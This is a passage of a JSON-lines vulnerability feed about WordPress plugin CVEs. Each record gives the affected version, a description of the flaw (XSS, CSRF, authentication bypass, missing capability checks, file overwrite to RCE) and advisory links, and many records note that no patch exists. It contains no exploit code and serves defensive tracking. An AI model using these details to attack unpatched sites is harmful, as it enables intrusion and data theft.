:\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/photo-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/photo-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5169","slug":"video-widget","versionImpact":"1.2.3","description":"The Video Widget WordPress plugin through 1.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0de62e3-5e85-43f3-8e3e-e816dafb1406\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0de62e3-5e85-43f3-8e3e-e816dafb1406\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6599","slug":"meks-video-importer","versionImpact":"1.0.11","description":"The Meks Video Importer plugin for WordPress is vulnerable to unauthorized API key modification due to a missing capability check on the ajax_save_settings function in all versions up to, and including, 1.0.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's API keys.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf9cc48-1ba6-4e9b-9f49-54f7747c26e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf9cc48-1ba6-4e9b-9f49-54f7747c26e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-vimeo.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-vimeo.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-youtube.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-youtube.php#L98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6018","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3f50e30-c7c5-4e7e-988c-ab884d75870b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3f50e30-c7c5-4e7e-988c-ab884d75870b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9931","slug":"wux-blog-editor","versionImpact":"3.0.0","description":"The Wux Blog Editor plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.0.0. This is due to missing validation on the token being supplied during the autologin through the plugin. This makes it possible for unauthenticated attackers to log in to the first administrator user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494ef738-c900-4d00-8739-3b261586d4ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494ef738-c900-4d00-8739-3b261586d4ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12447","slug":"get-post-content-shortcode","versionImpact":"0.4","description":"The Get Post Content Shortcode plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.4 via the 'post-content' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of password-protected, private, draft, and pending posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-post-content-shortcode\\\/trunk\\\/get-post-content-shortcode.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-post-content-shortcode\\\/trunk\\\/get-post-content-shortcode.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b92091-e615-484f-b402-2e793eed214d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b92091-e615-484f-b402-2e793eed214d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12252","slug":"seo-beginner-auto-post","versionImpact":"2.2.1","description":"The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-beginner-auto-post\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-beginner-auto-post\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67df10cc-ce3c-4157-9860-7e367062f710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67df10cc-ce3c-4157-9860-7e367062f710?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13386","slug":"quote-post-type-plugin","versionImpact":"1.2.2","description":"The quote-posttype-plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Author field in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quote-post-type-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quote-post-type-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4aa09e5b-fc3d-4409-bf2c-dd8aae69eeda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4aa09e5b-fc3d-4409-bf2c-dd8aae69eeda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3106","slug":"lastudio-element-kit","versionImpact":"1.4.9","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Table of Contents widget in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/tablet-contents.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/tablet-contents.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275257\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275257\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c633419-e231-437f-a2af-6f564cffc2df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c633419-e231-437f-a2af-6f564cffc2df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5142","slug":"simple-page-access-restriction","versionImpact":"1.0.31","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.31. This is due to missing nonce validation and capability checks in the settings save handler in the settings.php script. This makes it possible for unauthenticated attackers to (1) enable or disable access protection on all post types or taxonomies, (2) force every new page\/post to be public or private, regardless of meta-box settings, (3) cause a silent wipe of all plugin data when it\u2019s later removed, or (4) to conduct URL redirection attacks via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-page-access-restriction\\\/tags\\\/1.0.31\\\/includes\\\/admin\\\/settings\\\/settings.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-page-access-restriction\\\/tags\\\/1.0.31\\\/includes\\\/admin\\\/settings\\\/settings.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300680\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300680\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-page-access-restriction\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-page-access-restriction\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657e2a4d-7e10-495d-8352-1adc0cb89e83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657e2a4d-7e10-495d-8352-1adc0cb89e83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2304","slug":"favorites","versionImpact":"2.3.2","description":"The Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_favorites' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bd03cd0-34f0-491c-8247-79656eba32a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bd03cd0-34f0-491c-8247-79656eba32a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919192%40favorites&old=2805323%40favorites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919192%40favorites&old=2805323%40favorites&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/assets\\\/js\\\/favorites.js#L421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/assets\\\/js\\\/favorites.js#L421\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/app\\\/API\\\/Shortcodes\\\/UserFavoritesShortcode.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/app\\\/API\\\/Shortcodes\\\/UserFavoritesShortcode.php#L57\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47552","slug":"image-hover-effects","versionImpact":"5.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Image Hover Effects \u2013 WordPress Plugin. This issue affects Image Hover Effects \u2013 WordPress Plugin: from n\/a through 5.5.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-hover-effects\\\/wordpress-image-hover-effects-plugin-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-hover-effects\\\/wordpress-image-hover-effects-plugin-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1091","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reinitialize function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to remove all plugin data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2036","slug":"apply-online","versionImpact":"2.6","description":"The ApplyOnline \u2013 Application Form Builder and Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the aol_modal_box AJAX action in all versions up to, and including, 2.6. This makes it possible for authenticated attackers, with subscriber access or higher, to view Application submissions.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eff4992-dbd4-4b9b-872e-1670ce7dab9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eff4992-dbd4-4b9b-872e-1670ce7dab9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apply-online\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apply-online\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5071","slug":"bookster","versionImpact":"1.1.0","description":"The Bookster WordPress plugin through 1.1.0 allows adding sensitive parameters when validating appointments, allowing attackers to manipulate the data sent when booking an appointment (the request body) to change its status from pending to approved.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b293cf-5174-45de-8606-a782a96a35b3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b293cf-5174-45de-8606-a782a96a35b3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6175","slug":"booking-ultra-pro","versionImpact":"1.1.13","description":"The Booking Ultra Pro Appointments Booking Calendar Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple functions in all versions up to, and including, 1.1.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify and delete multiple plugin options and data such as payments, pricing, booking information, business hours, calendars, profile information, and email templates.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0594ed62-0a41-4819-89b8-ea31afbcac73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0594ed62-0a41-4819-89b8-ea31afbcac73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-ultra-pro\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-ultra-pro\\\/#description\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6017","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not have CSRF checks in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06d0559e-4389-4280-bbef-d100c0e07903\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06d0559e-4389-4280-bbef-d100c0e07903\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9930","slug":"sb-core","versionImpact":"0.2.3.2","description":"The Extensions by HocWP Team plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.2.3.2. This is due to missing validation on the user being supplied in the 'verify_email' action. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator. The vulnerability is in the Account extension.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca3775db-0722-4090-924e-81e38d5dce97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca3775db-0722-4090-924e-81e38d5dce97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-core\\\/trunk\\\/ext\\\/account.php?rev=2715527#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-core\\\/trunk\\\/ext\\\/account.php?rev=2715527#L374\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12411","slug":"wp-ad-guru","versionImpact":"2.5.4","description":"The WP Ad Guru \u2013 Banner ad, Responsive popup, Popup maker, Ad rotator & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ad-guru\\\/trunk\\\/includes\\\/admin\\\/zone-manager\\\/zone-manager-page.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ad-guru\\\/trunk\\\/includes\\\/admin\\\/zone-manager\\\/zone-manager-page.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12214","slug":"woocommerce-hss-extension-for-streaming-video","versionImpact":"3.31","description":"The WooCommerce HSS Extension for Streaming Video plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018videolink\u2019 parameter in all versions up to, and including, 3.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-hss-extension-for-streaming-video\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-hss-extension-for-streaming-video\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d633f71-3b2b-4fe3-80f1-4c2dcc86313c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d633f71-3b2b-4fe3-80f1-4c2dcc86313c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13367","slug":"sandbox","versionImpact":"0.4","description":"The Sandbox plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the export_download action in all versions up to, and including, 0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download an entire copy of a sandbox environment which can contain sensitive information like the wp-config.php file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sandbox\\\/trunk\\\/sandbox-ajax.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sandbox\\\/trunk\\\/sandbox-ajax.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59880d92-5d75-432f-9fb5-d74b13d101ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59880d92-5d75-432f-9fb5-d74b13d101ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13112","slug":"wp-mediatagger","versionImpact":"4.1.1","description":"The WP MediaTagger WordPress plugin through 4.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/155df231-30ef-47bb-aa91-a7deb1779bd1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/155df231-30ef-47bb-aa91-a7deb1779bd1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13866","slug":"simple-notification","versionImpact":"1.3","description":"The Simple Notification plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-notification\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-notification\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e814f798-5ebc-4bea-838f-d0a803f9bdbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e814f798-5ebc-4bea-838f-d0a803f9bdbc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1320","slug":"teachpress","versionImpact":"9.0.9","description":"The teachPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.0.9. This is due to missing or incorrect nonce validation on the import.php page. This makes it possible for unauthenticated attackers to delete imports via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/teachpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/teachpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b677ad8b-4f01-4147-bcf6-ae769046be48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b677ad8b-4f01-4147-bcf6-ae769046be48?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3056","slug":"download-manager","versionImpact":"3.3.12","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.3.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275196\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275196\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9e6ba7-f107-4d7c-a7da-35e603f3a1a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9e6ba7-f107-4d7c-a7da-35e603f3a1a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5236","slug":"ninjateam-telegram","versionImpact":"1.1","description":"The NinjaTeam Chat for Telegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018username\u2019 parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjateam-telegram\\\/trunk\\\/blocks\\\/src\\\/init.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjateam-telegram\\\/trunk\\\/blocks\\\/src\\\/init.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302588\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302588\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninjateam-telegram\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninjateam-telegram\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/725feb15-aa9b-4c00-bb95-ee0616000a14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/725feb15-aa9b-4c00-bb95-ee0616000a14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
